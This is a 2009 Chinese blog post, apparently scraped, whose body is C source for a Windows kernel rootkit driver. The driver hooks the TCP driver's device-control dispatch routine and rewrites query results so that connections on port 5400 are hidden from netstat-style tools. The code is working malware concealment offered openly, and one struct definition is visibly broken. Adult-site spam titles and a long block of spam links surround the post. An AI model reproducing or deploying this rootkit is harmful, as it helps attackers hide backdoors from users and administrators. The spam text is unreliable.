青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

隨筆-23  評(píng)論-73  文章-3  trackbacks-0

/************************************************************
 驅(qū)動(dòng)層隱藏端口示例:

 說明:通過HookTCP驅(qū)動(dòng)程序的Irp分派例程(irpStack->MajorFunction[IRP_MJ_DEVICE_CONTROL])
          來隱藏應(yīng)用層查詢端口信息
************************************************************/
#include <ntddk.h>

#define CO_TL_ENTITY 0x400
#define CL_TL_ENTITY 0x401
#define IOCTL_TCP_QUERY_INFORMATION_EX 0x00120003
#define HTONS(a) (((0xFF&a)<<8) + ((0xFF00&a)>>8))

typedef struct TDIEntityID
{
 ULONG tei_entity;
 ULONG tei_instance;
}TDIEntityID;

typedef struct TDIObjectID
{
 TDIEntityID toi_entity;
 ULONG toi_class;
 ULONG toi_type;
 ULONG toi_id;
}TDIObjectID;

typedef struct _CONNINFO101

 unsigned long status;
 unsigned long src_addr;
 unsigned short src_port;
 unsigned short unk1;
 unsigned long dst_addr;
 unsigned short dest_port;
 unsigned short unk2;
}CONNINFO101,*PCONNINFO101;

typedef struct _CONNINFO102
{
 unsigned long status;
 unsigned long src_addr;
 unsigned short src_port;
 unsigned short unk1;
 unsigned long dst_addr;
 unsigned short dst_port;
 unsigned short unk2;
 unsigned long pid;
}CONNINFO102,*PCONNINFO102;

typedef struct _CONNINFO110
{
 unsigned long size;
 unsigned long status;
 unsigned long src_addr;
 unsigned short src_port;
 unsigned short unk1;
 unsigned long dst_addr;
 unsigned short dst_port;
 unsigned short unk2;
 unsigned long pid;
 PVOID unk3[35];
}CONNINFO110,*PCONNINFO110;

typedef struct _REQINFO
{
 PIO_COMPLETION_ROUTINE OldCompletion;
 unsigned long ReqType;
}REQINFO,*PREQINFO;

PFILE_OBJECT pFile_tcp;
PDEVICE_OBJECT pDev_tcp;
PDRIVER_OBJECT pDrv_tcpip;

typedef NTSTATUS (*OLDIRPMJDEVICECONTROL)(IN PDEVICE_OBJECT,IN PIRP);
OLDIRPMJDEVICECONTROL OldIrpMjDeviceControl;

NTSTATUS IoCompletionRoutine( IN PDEVICE_OBJECT DeviceObject,
         IN PIRP Irp,
         IN PVOID Context )
/*
* 如果將端口的狀態(tài)信息改為0,則端口就不顯示
* 各個(gè)端口狀態(tài)信息如下:
*  1 = CLOSED
*  2 = LISTENING
*  3 = SYN_SENT
*  4 = SYN_RECEIVED
*  5 = ESTABLISHED
*  6 = FIN_WAIT_1
*  7 = FIN_WAIT_2
*  8 = CLOSE_WAIT
*  9 = CLOSING
*  ......
*/
{
 PVOID OutputBuffer;
 ULONG NumOutputBuffers;
 PIO_COMPLETION_ROUTINE p_compRoutine;
 ULONG i;
 
 OutputBuffer = Irp->UserBuffer;
 //將以前的Irp中的完成函數(shù)的指針恢復(fù)
 p_compRoutine = ((PREQINFO)Context)->OldCompletion;
 //以下為判斷各種網(wǎng)絡(luò)請(qǐng)求的參數(shù)類型
 if(((PREQINFO)Context)->ReqType == 0x101)
 {
  NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO101);
  for( i = 0;i < NumOutputBuffers;i ++ )
  {
   //在這里隱藏端口
   if(HTONS(((PCONNINFO101)OutputBuffer)[i].src_port) == 5400 )
   {
    ((PCONNINFO101)OutputBuffer)[i].status = 0;
   }
  }
 }
 else if(((PREQINFO)Context)->ReqType == 0x102)
 {
  NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO102);
  for( i = 0;i < NumOutputBuffers;i ++ )
  {
   if(HTONS(((PCONNINFO102)OutputBuffer)[i].src_port) == 5400 )
   {
    ((PCONNINFO102)OutputBuffer)[i].status = 0;
   }
  }
 }
 else if(((PREQINFO)Context)->ReqType == 0x110)
 {
  NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO110);
  for( i = 0;i < NumOutputBuffers;i ++ )
  {
   if(HTONS(((PCONNINFO110)OutputBuffer)[i].src_port) == 5400 )
   {
    ((PCONNINFO110)OutputBuffer)[i].status = 0;
   }
  }
 }
 //釋放在Hook中分配的內(nèi)存
 ExFreePool(Context);
 
 if( (Irp->StackCount > (ULONG)1) && (p_compRoutine != NULL) )
 {
  //如果以前的IRP中有完成例程,就調(diào)用以前的完成例程
  return (p_compRoutine)(DeviceObject,Irp,NULL);
 }
 else
 {
  //如果以前的Irp沒有完成例程,就返回本Hook的狀態(tài)
  return Irp->IoStatus.Status;
 }
}

NTSTATUS HookedDeviceControl(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp)
{
 PIO_STACK_LOCATION irpStack;
 ULONG ioTransferType;
 TDIObjectID *inputBuffer;
 ULONG context;
 
 irpStack = IoGetCurrentIrpStackLocation(Irp);
 //判斷當(dāng)前IRP棧單元的IRP_MJ_*例程
 switch( irpStack->MajorFunction )
 {
  case IRP_MJ_DEVICE_CONTROL:
  //如果IRP的次功能號(hào)為0且IOCTL查詢代碼為IOCTL_TCP_QUERY_INFORMATION_EX,
  //說明是應(yīng)用層程序通過netstat.exe之類的程序請(qǐng)求查詢TCP端口號(hào)信息
  if((irpStack->MinorFunction == 0) && (irpStack->Parameters.DeviceIoControl.IoControlCode == IOCTL_TCP_QUERY_INFORMATION_EX))
  {
   //得到IoControlCode中的請(qǐng)求類型,判斷是否為METHOD_NEITHER方式的Irp
   //ioTransferType &= 3;是得到CTL_CODE中Irp的請(qǐng)求方式(METHOD_BUFFERED,METHOD_IN_DIRECT or METHOD_OUT_DIRECT,MOTHOD_NEITHER)
   ioTransferType = irpStack->Parameters.DeviceIoControl.IoControlCode;
   ioTransferType &= 3;
   if( ioTransferType == METHOD_NEITHER )
   {
    //MOTHOD_NEITHER方式的Irp的輸入緩沖區(qū)在Type3InputBuffer中
    inputBuffer = (TDIObjectID *)irpStack->Parameters.DeviceIoControl.Type3InputBuffer;
    //如果TDIObjectID的請(qǐng)求方式為CO_TL_ENTITY類型,說明是請(qǐng)求查詢TCP端口信息
    if( inputBuffer->toi_entity.tei_entity == CO_TL_ENTITY )
    {
     //0x101,0x102,0x110為應(yīng)用層程序查詢時(shí)所帶的不同參數(shù)
     if( (inputBuffer->toi_id == 0x101) || (inputBuffer->toi_id == 0x102) || (inputBuffer->toi_id == 0x110) )
     {
      //改變Irp棧單元的控制位標(biāo)志
      irpStack->Control = 0;
      irpStack->Control |= SL_INVOKE_ON_SUCCESS;
      //在Irp的棧單元中分配一個(gè)上下文,保存以前Irp的完成例程和應(yīng)用層參數(shù)信息
      irpStack->Context = (PIO_COMPLETION_ROUTINE)ExAllocatePool(NonPagedPool,sizeof(REQINFO));
      //保存舊的完成例程
      ((PREQINFO)irpStack->Context)->OldCompletion = irpStack->CompletionRoutine;
      ((PREQINFO)irpStack->Context)->ReqType = inputBuffer->toi_id;
      //安裝新的完成例程
      //這步操作很重要,當(dāng)鉤住當(dāng)前的TCP驅(qū)動(dòng)對(duì)象以后,就可以先一步得到發(fā)送驅(qū)動(dòng)程序的Irp
      //在鉤子函數(shù)中處理完這個(gè)Irp后要把這個(gè)Irp發(fā)給真正的TCP驅(qū)動(dòng)程序
      //在真正的TCP驅(qū)動(dòng)程序處理完成這個(gè)Irp以后,我們的鉤子函數(shù)唯一可以再得到這個(gè)Irp的方式是
      //給這個(gè)Irp設(shè)置完成例程
      irpStack->CompletionRoutine = (PIO_COMPLETION_ROUTINE)IoCompletionRoutine;
     }
    }
   }
  }
  break;
  default:
  break;
 }
 //調(diào)用以前的DeviceIoControl函數(shù)
 return OldIrpMjDeviceControl(DeviceObject,Irp);
}

NTSTATUS InstallTCPDriverHook()
{
 NTSTATUS ntStatus;
 UNICODE_STRING deviceTCPUnicodeString;
 WCHAR deviceTCPNameBuffer[] = L"\\Device\\Tcp";
 
 pFile_tcp = NULL;
 pDev_tcp = NULL;
 pDrv_tcpip = NULL;
 
 RtlInitUnicodeString(&deviceTCPUnicodeString,deviceTCPNameBuffer);
 //得到TCP驅(qū)動(dòng)程序的設(shè)備對(duì)象和文件對(duì)象
 ntStatus = IoGetDeviceObjectPointer(&deviceTCPUnicodeString,FILE_READ_DATA,&pFile_tcp,&pDev_tcp);
 if( !NT_SUCCESS(ntStatus) )
 {
  return ntStatus;
 }
 //得到TCP設(shè)備對(duì)象對(duì)應(yīng)的驅(qū)動(dòng)程序?qū)ο?br> pDrv_tcpip = pDev_tcp->DriverObject;
 //保存以前TCP驅(qū)動(dòng)對(duì)象中IRP_MJ_DEVICE_CONTROL函數(shù)的指針
 OldIrpMjDeviceControl = pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL];
 if( OldIrpMjDeviceControl )
 {
  //替換TCP驅(qū)動(dòng)對(duì)象的IRP_MJ_DEVICE_CONTROL函數(shù)的指針為鉤子函數(shù)的指針
  InterlockedExchange((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL],(LONG)HookedDeviceControl);  
 }
 return STATUS_SUCCESS;
}

VOID Unload( IN PDRIVER_OBJECT  DriverObject )
{
 if( OldIrpMjDeviceControl )
 {
  //在這里恢復(fù)以前的函數(shù)入口地址
  pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL] = OldIrpMjDeviceControl;
 }
 DbgPrint("Rootkits Unload \n");
}

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath)
{
 DbgPrint("Rootkits Load \n");
 DriverObject->DriverUnload = Unload;
 //安裝驅(qū)動(dòng)程序的Irp分派函數(shù)鉤子
 return InstallTCPDriverHook();
}

posted on 2009-01-13 10:56 ViskerWong 閱讀(2467) 評(píng)論(0)  編輯 收藏 引用

只有注冊(cè)用戶登錄后才能發(fā)表評(píng)論。
網(wǎng)站導(dǎo)航: 博客園   IT新聞   BlogJava   博問   Chat2DB   管理


青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            欧美在线视频在线播放完整版免费观看| 欧美一区二区黄| 国产精品久久国产三级国电话系列 | 亚洲最快最全在线视频| 亚洲美女在线观看| 午夜国产不卡在线观看视频| 欧美亚洲视频一区二区| 开元免费观看欧美电视剧网站| 久久中文字幕导航| 亚洲精品在线三区| 欧美一区二区女人| 欧美a级理论片| 国产精品毛片在线| 亚洲国产精品视频| 亚洲欧美日韩一区在线| 美腿丝袜亚洲色图| 宅男在线国产精品| 久久综合九色九九| 国产农村妇女毛片精品久久莱园子| 尤物九九久久国产精品的分类| 国产精品99久久久久久久vr| 久久久蜜桃一区二区人| 日韩网站在线| 久久久久久穴| 国产区精品在线观看| 亚洲精品日日夜夜| 久久精品欧洲| 亚洲免费电影在线| 国产日韩精品视频一区| 欧美三日本三级少妇三2023 | 亚洲国产成人精品久久久国产成人一区| 亚洲日本久久| 久久久高清一区二区三区| 亚洲裸体俱乐部裸体舞表演av| 久久精品日韩| 国产精品最新自拍| 亚洲一区久久久| 亚洲国产精彩中文乱码av在线播放| 一本色道久久综合亚洲91| 欧美成ee人免费视频| 激情婷婷久久| 久久久久久亚洲精品中文字幕 | 国产日韩欧美综合精品| 夜夜嗨av一区二区三区网页| 欧美 日韩 国产一区二区在线视频 | 99人久久精品视频最新地址| 欧美aⅴ99久久黑人专区| 亚洲香蕉伊综合在人在线视看| 欧美精品不卡| 一区二区三区欧美在线| 亚洲第一精品在线| 免费成人黄色片| 最新国产の精品合集bt伙计| 免费观看不卡av| 久久中文精品| 91久久精品国产91性色| 欧美大成色www永久网站婷| 久久九九热免费视频| 激情视频一区二区| 欧美电影免费| 欧美激情综合五月色丁香| 日韩一二在线观看| 夜夜嗨av色综合久久久综合网 | 日韩视频一区二区三区在线播放免费观看 | 亚洲欧美日产图| 亚洲伊人色欲综合网| 国产精品一二三四| 久久精品综合一区| 久久一区中文字幕| 亚洲欧洲精品成人久久奇米网| 亚洲国产91精品在线观看| 欧美激情一区二区三区不卡| 一本大道久久a久久精二百| aa级大片欧美三级| 欧美成人中文字幕在线| 欧美电影免费观看高清| 久久精品国产69国产精品亚洲| 好吊色欧美一区二区三区视频| 欧美**人妖| 欧美日本高清一区| 欧美一级理论片| 久久久中精品2020中文| 99视频精品免费观看| 亚洲欧美日本在线| 亚洲日韩中文字幕在线播放| 亚洲国内精品在线| 国产精品国色综合久久| 久久精品视频亚洲| 欧美理论在线播放| 久久久另类综合| 欧美色区777第一页| 久久综合九色综合网站 | 国内外成人在线| 亚洲第一网站| 国产麻豆精品theporn| 欧美成人免费网| 国产精品天美传媒入口| 欧美电影免费观看高清完整版| 欧美特黄一级大片| 欧美国内亚洲| 国产一区二区丝袜高跟鞋图片| 亚洲精品欧美| 国产欧美一区二区三区久久| 亚洲高清一区二| 国模精品一区二区三区色天香| av成人免费在线| 亚洲精品久久久久久久久| 欧美一区二区日韩一区二区| 亚洲视频免费| 欧美xx视频| 免费看亚洲片| 国产资源精品在线观看| 亚洲一区二区三区在线| 日韩午夜免费| 欧美~级网站不卡| 欧美aa国产视频| 国产日韩在线亚洲字幕中文| 99在线精品免费视频九九视| 最新日韩精品| 欧美aⅴ一区二区三区视频| 久久综合成人精品亚洲另类欧美 | 一区二区三区欧美成人| 欧美成人精品高清在线播放| 久久综合狠狠综合久久综合88 | 国产精品第2页| 99精品久久久| 亚洲视频日本| 欧美日韩一区二区三区免费| 亚洲第一精品电影| 亚洲日本无吗高清不卡| 美日韩精品视频免费看| 欧美va天堂va视频va在线| 在线精品福利| 免费成人av在线| 亚洲高清二区| 日韩视频在线一区二区| 亚洲人成在线影院| 国产精品成人一区| 亚洲乱码日产精品bd| 亚洲乱码久久| 欧美久久电影| 日韩视频免费观看| 亚洲在线一区二区三区| 国产精品高清网站| 亚洲欧美日韩在线播放| 久久精品盗摄| 伊人春色精品| 欧美成人一区二区三区在线观看 | 亚欧成人在线| 美日韩丰满少妇在线观看| 极品尤物av久久免费看 | 欧美亚洲日本国产| 久久综合久色欧美综合狠狠| 韩国精品主播一区二区在线观看| 久久久一区二区三区| 亚洲人体大胆视频| 午夜视频久久久久久| 黄色国产精品一区二区三区| 美女视频黄免费的久久| 亚洲美女精品久久| 久久精品国产综合| 亚洲精品三级| 国产伦精品一区二区三区高清| 久久黄金**| 亚洲日韩视频| 欧美在线看片| 亚洲精品永久免费精品| 国产精品视频最多的网站| 久久婷婷麻豆| 亚洲小视频在线观看| 欧美激情片在线观看| 午夜电影亚洲| 亚洲巨乳在线| 激情婷婷久久| 国产精品第十页| 欧美国产高潮xxxx1819| 亚洲一级黄色av| 欧美风情在线观看| 欧美在线一级va免费观看| 亚洲久久一区二区| 激情欧美日韩| 国产亚洲精品bt天堂精选| 欧美猛交免费看| 久久男人av资源网站| 亚洲香蕉网站| 亚洲毛片av在线| 暖暖成人免费视频| 久久精品国产精品亚洲| 亚洲一区二区综合| 一区二区日韩伦理片| 亚洲成色999久久网站| 国产美女精品一区二区三区| 欧美激情国产日韩| 久久躁日日躁aaaaxxxx| 性久久久久久| 亚洲欧美日韩成人高清在线一区| 亚洲精品护士| 亚洲人成7777| 最新日韩欧美| 亚洲国产精品视频一区|